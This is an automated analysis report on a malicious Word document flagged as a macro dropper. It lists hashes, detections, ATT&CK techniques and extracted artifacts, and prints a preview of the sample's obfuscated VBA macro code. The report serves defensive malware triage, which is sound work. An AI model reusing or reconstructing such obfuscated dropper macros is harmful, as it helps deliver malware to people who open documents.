Office (OLE) malware analysis — malicious · 90102a7d9dee5161

MALICIOUS

Office (OLE)

82.5 KB Created: 2016-05-12 23:30:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: c1b02eab59d5d18dc80431c8293bcd92 SHA-1: c00d428ae341bb269cf82071aec83679b70d44d7 SHA-256: 90102a7d9dee51611bbdd11313e897b0131d62c7539b1eb8e06f30a8f17f8c92

164 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as a malicious dropper by ClamAV. It contains VBA macros that reference Windows Script Host and use p-code auto-execution with CreateObject, indicating an attempt to run arbitrary code. The VBA script itself is heavily obfuscated but appears to be designed to download and execute a second-stage payload, a common technique for malware droppers.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6403843-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6403843-0
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	932 bytes
SHA-256: `82367b3403464a2cf109418258528aabdfdc790ef3f0ad1456f8f00cac0b33bb`
Detection ClamAV: No threats found Obfuscation or payload: likely 20 of 36 identifiers look randomly generated (e.g. 'kgTosaNcQtJKyZ') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "AlJtwNCb" Private Function AEkJuoQXn(ByVal SjFGXBSIZo As Boolean, ByVal QywIAsVIlU As String) As Boolean aAnoEkmH TYWXT SIYNpFH If bIFLsWSDYA Then sjrIRNel pIxxnGPm True, 5648 Else oRDnv GIOdryBDU End If AEkJuoQXn = False End Function Public Function NzbElOh(ByVal OcSPG As String, ByVal BLrczxe As String) As String Dim lZvgod As Boolean Dim AXqlhEwBJM As String crcNfikH = "yNlcbVjCGY" For lZMFrSpy = 1 To Len(OcSPG) lZvgod = jNiMX.mvDohfyl(jNiMX.ViNpHGUzC(lZMFrSpy, 5243, AjJJop, OcSPG), BLrczxe) If Not lZvgod Then NzbElOh = jNiMX.TpFOIGlDV(2102, True, jNiMX.ViNpHGUzC(lZMFrSpy, 5243, AjJJop, OcSPG), NzbElOh) fitPL = "VkxeMRma7" End If Next End Function Private Function qgxwLgW() As Integer ngHBnhTd 5855, 1524 UimfM kCujVAMx If zXmQhJr Then vMylTY ROzIu End If qgxwLgW = 5758 End Function Private Function AjJJop() As String AjJJop = "kgTosaNcQtJKyZ" End Function

Open this report in the interactive analyzer, or submit your own file for analysis.